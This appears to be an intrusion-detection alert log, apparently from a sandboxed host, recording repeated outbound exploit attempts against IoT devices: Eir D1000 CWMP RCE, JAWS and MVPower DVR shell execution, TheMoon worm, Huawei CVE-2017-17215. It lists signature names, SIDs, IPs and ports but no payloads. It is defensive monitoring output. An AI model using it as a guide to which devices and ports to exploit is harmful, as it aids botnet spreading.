Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 38.55.170.75

Timestamp:	03/18/24-09:58:39.605878
SID:	2025576
Source Port:	50898
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.140.199.124

Timestamp:	03/18/24-09:59:21.185835
SID:	2023548
Source Port:	35792
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 178.20.216.198

Timestamp:	03/18/24-09:58:58.517019
SID:	2025576
Source Port:	41866
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 147.46.119.255

Timestamp:	03/18/24-09:58:42.352358
SID:	2023548
Source Port:	56442
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 203.56.69.38

Timestamp:	03/18/24-09:58:36.914063
SID:	2025576
Source Port:	50240
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.54.48.148

Timestamp:	03/18/24-09:59:14.374053
SID:	2023548
Source Port:	48074
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 38.91.50.181

Timestamp:	03/18/24-09:57:07.961343
SID:	2023548
Source Port:	44132
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 191.96.112.152

Timestamp:	03/18/24-10:00:03.658389
SID:	2030092
Source Port:	60832
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 124.250.115.203

Timestamp:	03/18/24-09:58:41.380741
SID:	2025883
Source Port:	40506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.222.21.207

Timestamp:	03/18/24-09:59:19.268973
SID:	2030092
Source Port:	34422
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.122.45.207

Timestamp:	03/18/24-09:59:07.954418
SID:	2018132
Source Port:	48766
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.0.173.220

Timestamp:	03/18/24-09:59:13.874315
SID:	2018132
Source Port:	59246
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.247.22.223

Timestamp:	03/18/24-10:00:08.933299
SID:	2023548
Source Port:	47724
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.194.225

Timestamp:	03/18/24-09:59:19.357483
SID:	2018132
Source Port:	46882
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.36.39.165

Timestamp:	03/18/24-09:59:26.018976
SID:	2023548
Source Port:	48364
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 184.68.111.174

Timestamp:	03/18/24-09:59:49.279723
SID:	2018132
Source Port:	36214
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.249.138

Timestamp:	03/18/24-09:58:54.706145
SID:	2018132
Source Port:	59698
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.115.152.35

Timestamp:	03/18/24-09:59:32.861127
SID:	2023548
Source Port:	39178
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 58.136.160.208

Timestamp:	03/18/24-09:58:48.532992
SID:	2023548
Source Port:	51246
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.130.22

Timestamp:	03/18/24-09:58:29.077668
SID:	2018132
Source Port:	42872
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 149.56.18.86

Timestamp:	03/18/24-09:59:57.885873
SID:	2030092
Source Port:	51800
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.8.117.169

Timestamp:	03/18/24-09:58:50.249914
SID:	2023548
Source Port:	50442
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 110.239.180.158

Timestamp:	03/18/24-09:58:29.835839
SID:	2023548
Source Port:	55868
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.82.33.187

Timestamp:	03/18/24-09:57:07.974103
SID:	2023548
Source Port:	59548
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.69.94.167

Timestamp:	03/18/24-09:59:19.121958
SID:	2025883
Source Port:	56682
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 163.18.18.192

Timestamp:	03/18/24-09:59:56.345485
SID:	2023548
Source Port:	60688
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 199.30.127.193

Timestamp:	03/18/24-09:59:15.558442
SID:	2023548
Source Port:	52638
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.177.254.224

Timestamp:	03/18/24-09:59:16.611769
SID:	2023548
Source Port:	55214
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 196.51.90.124

Timestamp:	03/18/24-09:59:34.175201
SID:	2025883
Source Port:	57494
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.194.52.107

Timestamp:	03/18/24-09:58:59.582202
SID:	2030092
Source Port:	46212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.248.44.174

Timestamp:	03/18/24-10:00:01.872367
SID:	2023548
Source Port:	33022
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 204.10.79.231

Timestamp:	03/18/24-09:59:15.656640
SID:	2023548
Source Port:	45676
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 45.32.163.115

Timestamp:	03/18/24-09:59:38.740414
SID:	2025576
Source Port:	39278
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.203.178.14

Timestamp:	03/18/24-09:59:10.001205
SID:	2023548
Source Port:	41194
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.233.102.108

Timestamp:	03/18/24-10:00:09.212834
SID:	2023548
Source Port:	48908
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.12.21.149

Timestamp:	03/18/24-09:58:36.195790
SID:	2025576
Source Port:	38962
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.252.58.166

Timestamp:	03/18/24-09:59:48.908512
SID:	2023548
Source Port:	47728
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.32.167.11

Timestamp:	03/18/24-09:58:12.749534
SID:	2023548
Source Port:	36432
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 51.159.17.96

Timestamp:	03/18/24-09:59:06.074820
SID:	2025576
Source Port:	42834
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.252.167.53

Timestamp:	03/18/24-09:58:12.149933
SID:	2023548
Source Port:	43940
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.209.204.179

Timestamp:	03/18/24-09:57:01.162413
SID:	2023548
Source Port:	57358
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 18.155.192.223

Timestamp:	03/18/24-09:58:15.756396
SID:	2025576
Source Port:	58548
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.228.141.94

Timestamp:	03/18/24-09:58:45.881840
SID:	2025883
Source Port:	36608
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.44.71.49

Timestamp:	03/18/24-10:00:20.802503
SID:	2025576
Source Port:	52122
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.81.245.68

Timestamp:	03/18/24-09:59:00.701023
SID:	2023548
Source Port:	45706
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.73.98

Timestamp:	03/18/24-09:58:42.167000
SID:	2018132
Source Port:	58952
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 87.215.146.149

Timestamp:	03/18/24-09:59:56.029432
SID:	2023548
Source Port:	51226
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.7.75.39

Timestamp:	03/18/24-09:57:07.788853
SID:	2023548
Source Port:	48880
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.52.77.91

Timestamp:	03/18/24-09:57:05.992995
SID:	2025883
Source Port:	43248
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 78.189.162.9

Timestamp:	03/18/24-09:58:13.352540
SID:	2025576
Source Port:	55880
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.240.116.87

Timestamp:	03/18/24-09:59:09.513112
SID:	2023548
Source Port:	43878
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.64.121.6

Timestamp:	03/18/24-09:59:19.139310
SID:	2030092
Source Port:	33490
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.212.105.153

Timestamp:	03/18/24-09:58:21.168181
SID:	2023548
Source Port:	34090
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 192.91.218.48

Timestamp:	03/18/24-09:58:31.242236
SID:	2030092
Source Port:	55202
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 96.41.3.80

Timestamp:	03/18/24-09:58:49.055203
SID:	2023548
Source Port:	38212
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.226.161.138

Timestamp:	03/18/24-10:00:16.094190
SID:	2023548
Source Port:	37136
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 118.31.15.44

Timestamp:	03/18/24-09:59:09.037596
SID:	2025883
Source Port:	56934
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.50.201

Timestamp:	03/18/24-09:58:18.147104
SID:	2018132
Source Port:	43902
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.12.149.159

Timestamp:	03/18/24-09:59:15.555894
SID:	2030092
Source Port:	60008
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.38.105.42

Timestamp:	03/18/24-10:00:16.246920
SID:	2025576
Source Port:	46418
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 18.205.190.47

Timestamp:	03/18/24-09:59:37.627408
SID:	2025883
Source Port:	41432
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.133.186.128

Timestamp:	03/18/24-09:57:00.926615
SID:	2023548
Source Port:	41864
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.36.158.199

Timestamp:	03/18/24-09:58:53.753295
SID:	2023548
Source Port:	34378
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.35.84.86

Timestamp:	03/18/24-09:59:37.589028
SID:	2025576
Source Port:	42022
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.187.189.53

Timestamp:	03/18/24-10:00:16.483005
SID:	2023548
Source Port:	46482
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 20.228.136.20

Timestamp:	03/18/24-09:59:54.355930
SID:	2030092
Source Port:	42938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 58.136.160.208

Timestamp:	03/18/24-09:58:48.894272
SID:	2023548
Source Port:	51280
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 188.243.240.140

Timestamp:	03/18/24-09:59:05.831584
SID:	2025883
Source Port:	52664
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 204.10.79.231

Timestamp:	03/18/24-09:59:16.750383
SID:	2023548
Source Port:	45690
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 46.250.231.216

Timestamp:	03/18/24-09:59:52.334147
SID:	2025883
Source Port:	56004
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.162.12.221

Timestamp:	03/18/24-09:58:22.611009
SID:	2023548
Source Port:	34728
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 200.93.84.236

Timestamp:	03/18/24-09:59:56.891782
SID:	2023548
Source Port:	51492
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 94.45.87.85

Timestamp:	03/18/24-09:58:12.139497
SID:	2023548
Source Port:	47858
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.226.82.70

Timestamp:	03/18/24-09:57:08.281995
SID:	2023548
Source Port:	46296
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 115.0.118.185

Timestamp:	03/18/24-09:59:36.014587
SID:	2023548
Source Port:	53284
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.213.120

Timestamp:	03/18/24-09:58:29.160032
SID:	2018132
Source Port:	34116
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.56.254

Timestamp:	03/18/24-10:00:06.889348
SID:	2018132
Source Port:	43224
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 136.0.97.153

Timestamp:	03/18/24-09:58:19.093141
SID:	2025883
Source Port:	36590
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.111.116.15

Timestamp:	03/18/24-09:58:22.229360
SID:	2023548
Source Port:	47566
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 63.32.154.23

Timestamp:	03/18/24-09:59:57.135033
SID:	2030092
Source Port:	54452
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 201.229.223.123

Timestamp:	03/18/24-09:59:41.586370
SID:	2025883
Source Port:	57974
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.27.23.103

Timestamp:	03/18/24-09:58:29.962111
SID:	2030092
Source Port:	38420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 172.252.27.60

Timestamp:	03/18/24-09:59:05.586859
SID:	2030092
Source Port:	37332
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.191.44.199

Timestamp:	03/18/24-09:58:13.413599
SID:	2018132
Source Port:	43036
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 142.93.38.172

Timestamp:	03/18/24-10:00:16.246845
SID:	2025576
Source Port:	55330
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.43.199.212

Timestamp:	03/18/24-10:00:22.756729
SID:	2023548
Source Port:	36426
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 124.218.48.114

Timestamp:	03/18/24-09:57:00.653067
SID:	2023548
Source Port:	36606
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.128.160.113

Timestamp:	03/18/24-09:59:01.490786
SID:	2023548
Source Port:	36858
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.230.18.128

Timestamp:	03/18/24-09:59:01.653664
SID:	2023548
Source Port:	36194
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 193.36.84.57

Timestamp:	03/18/24-10:00:06.586912
SID:	2025576
Source Port:	37556
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 75.140.199.124

Timestamp:	03/18/24-09:59:21.346217
SID:	2023548
Source Port:	35802
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 49.0.94.169

Timestamp:	03/18/24-09:58:24.371741
SID:	2030092
Source Port:	51354
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.29.246.133

Timestamp:	03/18/24-10:00:02.886577
SID:	2025883
Source Port:	52854
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 111.246.195.159

Timestamp:	03/18/24-10:00:22.267760
SID:	2023548
Source Port:	34258
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.205.39.176

Timestamp:	03/18/24-09:59:15.225435
SID:	2025883
Source Port:	37014
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 4.208.29.15

Timestamp:	03/18/24-09:57:05.776909
SID:	2025883
Source Port:	34490
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.213.109.77

Timestamp:	03/18/24-09:59:41.753558
SID:	2030092
Source Port:	54954
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 191.8.117.169

Timestamp:	03/18/24-09:58:50.470098
SID:	2023548
Source Port:	50456
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.4.17

Timestamp:	03/18/24-10:00:06.889414
SID:	2018132
Source Port:	52580
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.66.74.160

Timestamp:	03/18/24-09:58:31.173056
SID:	2030092
Source Port:	39976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.55.47.75

Timestamp:	03/18/24-10:00:06.304202
SID:	2023548
Source Port:	40262
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 186.210.173.21

Timestamp:	03/18/24-09:58:42.507315
SID:	2023548
Source Port:	55582
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.110.177.218

Timestamp:	03/18/24-09:59:13.733527
SID:	2025576
Source Port:	57900
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.222.148.118

Timestamp:	03/18/24-09:59:23.782027
SID:	2023548
Source Port:	55402
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.129.40.240

Timestamp:	03/18/24-09:58:15.471628
SID:	2030092
Source Port:	42848
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.77.139.90

Timestamp:	03/18/24-09:58:32.277673
SID:	2835222
Source Port:	46454
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 125.158.173.31

Timestamp:	03/18/24-09:59:24.726233
SID:	2023548
Source Port:	53438
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 206.189.8.131

Timestamp:	03/18/24-09:59:24.710785
SID:	2030092
Source Port:	49050
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 188.65.51.177

Timestamp:	03/18/24-09:59:40.020155
SID:	2025576
Source Port:	33744
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.194.185

Timestamp:	03/18/24-09:59:55.817733
SID:	2018132
Source Port:	35966
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 78.189.215.32

Timestamp:	03/18/24-10:00:22.218304
SID:	2023548
Source Port:	46794
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

